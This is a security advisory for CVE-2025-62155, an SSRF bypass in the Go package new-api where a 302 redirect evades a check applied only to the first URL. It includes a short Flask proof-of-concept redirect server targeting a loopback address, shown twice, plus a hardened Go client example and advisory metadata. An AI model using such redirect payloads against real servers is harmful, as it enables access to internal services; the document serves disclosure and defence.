GHSA-9F46-W24H-69W4
Vulnerability from github – Published: 2025-11-24 20:05 – Updated: 2025-12-17 00:31
Summary
A recently patched SSRF vulnerability in new-api can still be exploited through a bypass of the existing fix. The fix validates only the URL the caller supplies; the outbound HTTP client then follows redirects without re-checking the new destination, so a 302 from an attacker-controlled host that passes the first check sends the server's request to an internal address.
Details
Deploy the following script on a server the attacker controls. It listens on port 8080 because 80, 443 and 8080 are in the administrator's default allowed-port range and therefore pass the initial check; the redirect target it hands back, 127.0.0.1:8003, is never checked because the restriction is applied only to the first request.
```
from flask import Flask, redirect

app = Flask(__name__)


@app.route('/redirect')
def ssrf_redirect():
    # The first request (to this host on an allowed port) passes the check;
    # the 302 Location pointing at loopback is followed without re-validation.
    return redirect('http://127.0.0.1:8003/uid.txt', code=302)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)
```
Then have the application fetch the attacker's /redirect URL: the response shows that the internal resource was reached.
At the same time, the listener opened locally on 127.0.0.1:8083/uid.txt logs the incoming request (the report cites port 8083 here while the script above redirects to 8003).
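The hardened counterpart, as an added example that is not new-api's code and not the content of the fix commit referenced below: a Go client whose outbound policy runs on the caller's URL and again on every redirect hop via http.Client.CheckRedirect, so the 302 in the report is rejected at the hop instead of being followed. The allowed-port set, the function names and the 203.0.113.0/24 addresses are assumptions for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/url"
	"time"
)

// allowedPorts stands in for the administrator-configured port range the
// advisory mentions (80, 443, 8080). Hypothetical policy, not new-api's config.
var allowedPorts = map[string]bool{"80": true, "443": true, "8080": true}

// isNonPublicIP reports whether ip must never be contacted on the server's
// behalf: loopback, RFC 1918/4193 private, link-local (which covers the
// 169.254.169.254 cloud metadata address), unspecified or multicast.
// IPv4-mapped IPv6 addresses such as ::ffff:127.0.0.1 are unwrapped first.
func isNonPublicIP(ip net.IP) bool {
	if ip4 := ip.To4(); ip4 != nil {
		ip = ip4
	}
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() || ip.IsUnspecified() || ip.IsMulticast()
}

// validateTarget applies the outbound policy to a single URL. The bypass in the
// advisory exists because the policy ran once, on the caller's URL; here the
// same function is also applied to every redirect target.
func validateTarget(u *url.URL) error {
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	port := u.Port()
	if port == "" {
		port = "80"
		if u.Scheme == "https" {
			port = "443"
		}
	}
	if !allowedPorts[port] {
		return fmt.Errorf("port %s not in allowlist", port)
	}
	host := u.Hostname()
	var ips []net.IP
	if ip := net.ParseIP(host); ip != nil {
		ips = []net.IP{ip}
	} else {
		resolved, err := net.LookupIP(host) // hostnames must be resolved before judging
		if err != nil {
			return fmt.Errorf("resolve %s: %w", host, err)
		}
		ips = resolved
	}
	for _, ip := range ips {
		if isNonPublicIP(ip) {
			return fmt.Errorf("%s resolves to non-public address %s", host, ip)
		}
	}
	return nil
}

// bypassableFetch reproduces the shape of the flawed fix: validate the first
// URL, then hand off to a client that follows up to 10 redirects unchecked.
func bypassableFetch(rawURL string) (*http.Response, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return nil, err
	}
	if err := validateTarget(u); err != nil {
		return nil, err
	}
	return http.DefaultClient.Get(u.String()) // a 302 to 127.0.0.1:8003 is followed
}

// newGuardedClient returns a client whose CheckRedirect re-runs the policy on
// the Location target (req.URL) before each hop and caps the hop count.
func newGuardedClient() *http.Client {
	return &http.Client{
		Timeout: 10 * time.Second,
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			if len(via) >= 3 {
				return errors.New("too many redirects")
			}
			return validateTarget(req.URL)
		},
	}
}

// guardedFetch validates the initial URL and then lets the guarded client
// validate every redirect hop; a blocked hop surfaces as a *url.Error.
func guardedFetch(rawURL string) (*http.Response, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return nil, err
	}
	if err := validateTarget(u); err != nil {
		return nil, err
	}
	return newGuardedClient().Get(u.String())
}

func main() {
	// Offline demonstration with IP literals (203.0.113.10 is a documentation
	// address standing in for the attacker's host).
	for _, s := range []string{
		"http://203.0.113.10:8080/redirect", // passes the first check, as in the report
		"http://127.0.0.1:8003/uid.txt",     // the redirect target: rejected on every hop
		"http://[::ffff:127.0.0.1]:80/",     // mapped loopback: also rejected
	} {
		u, _ := url.Parse(s)
		fmt.Printf("%-40s -> %v\n", s, validateTarget(u))
	}
}
```

Two caveats when adopting this pattern: the hostname branch resolves once for the check and the transport resolves again when it dials, which leaves a DNS-rebinding window, so a stricter version pins the vetted IP through a custom Transport.DialContext; and a redirect chain can also move between schemes or ports, which is why the whole policy, not just the address test, is re-run on each hop.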
Impact
A 302 redirect from a host that passes the allowed-port check lets a low-privileged user (CVSS PR:L) defeat the earlier SSRF fix and make new-api request arbitrary internal services. Fixed in 0.9.6, per the affected range below.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/QuantumNous/new-api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62155"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-24T20:05:21Z",
"nvd_published_at": "2025-11-25T00:15:46Z",
"severity": "HIGH"
},
"details": "### Summary\nA recently patched SSRF vulnerability contains a bypass method that can bypass the existing security fix and still allow SSRF to occur.\nBecause the existing fix only applies security restrictions to the first URL request, a 302 redirect can bypass existing security measures and successfully access the intranet.\n\n### Details\nUse the following script to deploy on the attacker\u0027s server. Since ports 80, 443, and 8080 are default ports within the security range set by the administrator and will not be blocked, the service is deployed on port 8080.\n```\nfrom flask import Flask, redirect \n \napp = Flask(__name__) \n \n@app.route(\u0027/redirect\u0027) \ndef ssrf_redirect(): \n return redirect(\u0027http://127.0.0.1:8003/uid.txt\u0027, code=302) \n \nif __name__ == \u0027__main__\u0027: \n app.run(host=\u00270.0.0.0\u0027, port=8080)\n```\nThen, a request is made to the malicious service opened by the attacker, and it can be found that the resources on the intranet are successfully accessed.\n\u003cimg width=\"663\" height=\"60\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2f296cff-510d-4cfe-8509-518e747bf8fe\" /\u003e\nAt the same time, the locally opened service 127.0.0.1:8083/uid.txt also received related requests.\n\u003cimg width=\"717\" height=\"79\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d6b6d2cc-280b-45b5-9946-10b7891bf017\" /\u003e\n\n### Impact\nUsing 302 redirects to bypass previous SSRF security fixes",
"id": "GHSA-9f46-w24h-69w4",
"modified": "2025-12-17T00:31:18Z",
"published": "2025-11-24T20:05:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-9f46-w24h-69w4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62155"
},
{
"type": "WEB",
"url": "https://github.com/QuantumNous/new-api/commit/e8966c73746d35bb7f4f014ad1195a96d445cacd"
},
{
"type": "PACKAGE",
"url": "https://github.com/QuantumNous/new-api"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "new-api is vulnerable to SSRF Bypass"
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.